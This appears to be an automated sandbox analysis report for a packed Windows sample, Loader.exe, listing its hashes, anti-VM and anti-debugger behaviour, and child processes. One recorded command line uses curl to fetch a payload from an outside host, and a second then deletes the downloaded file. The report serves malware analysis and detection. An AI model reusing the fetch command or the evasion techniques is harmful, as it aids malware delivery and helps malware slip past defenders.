Analysis
- max time kernel: 28s
- max time network: 33s
- platform: windows7_x64
- resource: win7-20230220-en
- resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
- submitted: 29-03-2023 23:36

Behavioral task: behavioral1
- Sample: Loader.exe
- Resource: win7-20230220-en (windows7-x64)
- 7 signatures
- 30 seconds
General
- Target: Loader.exe
- Size: 3.3MB
- MD5: aa27322c80872d70bcd3eabde5f88141
- SHA1: daef906c51350e74bc7eeace80e35b1bb2e2f443
- SHA256: 4b08cc716f6f89415e2dc85e3c4eb626fcb9b0697f1596d5a27482b5a40d3227
- SHA512: 12ad87b7ab61c92246ddae74eaa62223be948b57abcea1024b21a63bc0e1e6db66c3d911bbe30c857426602436a2a92479323513f25df9b683cda127a84e594e
- SSDEEP: 49152:F/4780JJXqoYgkt9fT5mhaKG/iKz8Sn/Jypm+IUK7AYoL2ENttSIyUA8z/haouab:cfit/R6Kz8S0IjgvPxyfQ54Yfsxbhc
Malware Config
Signatures
- Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 1 IoCs)
  Processes:
  - Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (process: Loader.exe)
- Checks BIOS information in registry (2 TTPs, 2 IoCs)
  BIOS information is often read in order to detect sandboxing environments.
  Processes:
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (process: Loader.exe)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (process: Loader.exe)
- YARA rule matches (rule: themida)
  Processes:
  - behavioral1/memory/1696-54-0x000000013F390000-0x000000013FCB5000-memory.dmp: themida
  - behavioral1/memory/1696-55-0x000000013F390000-0x000000013FCB5000-memory.dmp: themida
  - behavioral1/memory/1696-56-0x000000013F390000-0x000000013FCB5000-memory.dmp: themida
  - behavioral1/memory/1696-57-0x000000013F390000-0x000000013FCB5000-memory.dmp: themida
  - behavioral1/memory/1696-58-0x000000013F390000-0x000000013FCB5000-memory.dmp: themida
- Checks whether UAC is enabled
  Processes:
  - Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (process: Loader.exe)
- Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoCs)
  Processes:
  - PID 1696, process Loader.exe
- Suspicious behavior: EnumeratesProcesses (19 IoCs)
  Processes:
  - PID 1696, process Loader.exe (19 identical entries)
- Suspicious use of WriteProcessMemory (6 IoCs)
  Processes:
  - PID 1696 (Loader.exe) wrote to memory of PID 588 (cmd.exe) (3 entries)
  - PID 1696 (Loader.exe) wrote to memory of PID 1004 (cmd.exe) (3 entries)
Processes
- C:\Users\Admin\AppData\Local\Temp\Loader.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
  Signatures:
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  Child processes:
  - C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c curl --silent > OUTPUT.TXT https://auxy.gay/loader/loader.txt
  - C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c del OUTPUT.TXT >NUL
Network

MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
- memory/1696-54-0x000000013F390000-0x000000013FCB5000-memory.dmp (Filesize: 9.1MB)
- memory/1696-55-0x000000013F390000-0x000000013FCB5000-memory.dmp (Filesize: 9.1MB)
- memory/1696-56-0x000000013F390000-0x000000013FCB5000-memory.dmp (Filesize: 9.1MB)
- memory/1696-57-0x000000013F390000-0x000000013FCB5000-memory.dmp (Filesize: 9.1MB)
- memory/1696-58-0x000000013F390000-0x000000013FCB5000-memory.dmp (Filesize: 9.1MB)